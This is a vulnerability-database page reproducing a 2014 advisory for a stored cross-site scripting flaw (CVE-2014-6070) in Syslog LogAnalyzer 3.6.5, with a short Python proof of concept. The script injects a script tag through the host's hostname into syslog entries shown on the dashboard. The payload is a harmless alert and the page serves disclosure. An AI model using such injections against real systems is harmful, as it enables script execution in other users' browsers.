Lucene search
K

Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting

🗓️ 02 Sep 2014 00:00:00Reported by Dolev FarhiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Syslog LogAnalyzer 3.6.5 Stored XSS Vulnerability in LogAnalyzer 3.6.5 allows script injection via hostname change in syslog message

Related
Code
ReporterTitlePublishedViews
Family
0day.today
LogAnalyzer 3.6.5 Cross Site Scripting Vulnerability
4 Sep 201400:00
zdt
0day.today
Syslog LogAnalyzer 3.6.5 - Stored XSS Exploit
8 Sep 201400:00
zdt
CVE
CVE-2014-6070
11 Sep 201414:00
cve
Cvelist
CVE-2014-6070
11 Sep 201414:00
cvelist
Debian CVE
CVE-2014-6070
11 Sep 201414:00
debiancve
EUVD
EUVD-2014-5957
7 Oct 202500:30
euvd
exploitpack
Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)
2 Sep 201400:00
exploitpack
Tenable Nessus
LogAnalyzer < 3.6.6 index.php / detail.php 'hostname' Parameter XSS
5 Dec 201400:00
nessus
NVD
CVE-2014-6070
11 Sep 201414:16
nvd
Packet Storm
LogAnalyzer 3.6.5 Cross Site Scripting
2 Sep 201400:00
packetstorm
Rows per page
Vulnerability title: Syslog LogAnalyzer 3.6.5 Stored XSS
Author: Dolev Farhi
Contact: dolevf at yahoo dot com  @dolevff
Application: LogAnalyzer 3.6.5
Date: 8.2.2014
Relevant CVEs: CVE-2014-6070
Vulnerable version: <= 3.6.5
Fixed version: 3.6.6

1. About the application
------------------------
LogAnalyzer is a web interface to syslog and other network event data. 
It provides easy browsing, analysis of realtime network events and 
reporting services.


2. Vulnerabilities Descriptions:
-----------------------------
It was found that an XSS injection is possible on a syslog server 
running LogAnalyzer version 3.6.5.
by changing the hostname of any entity logging to syslog server with 
LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary
syslog message, a client-side script injection execution is possible.


4. proof of concept exploit
-----------------------
#!/usr/bin/python
# Exploit title = LogAnalyzer 3.5.6 Stored XSS injection
# Date: Sept 2014
# CVE: 2014-6070
# Tested on RHEL6.4

import os
import syslog

hostname = os.uname()[1]
payload = "\"<script>alert('XSS');</script>\""

print("+ Setting temporary hostname to " + payload + "...")
os.system("hostname " +  payload)

print("+ Injecting the syslog message...")
syslog.syslog("syslog xss injection")

print("+ Check LogAnalyzer dashboard...")

raw_input("+ Press [enter] to restore hostname...")
os.system("hostname " + "\""  +  hostname + "\"")

print("+ Hostname restored to " + hostname)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Sep 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
EPSS0.07917
26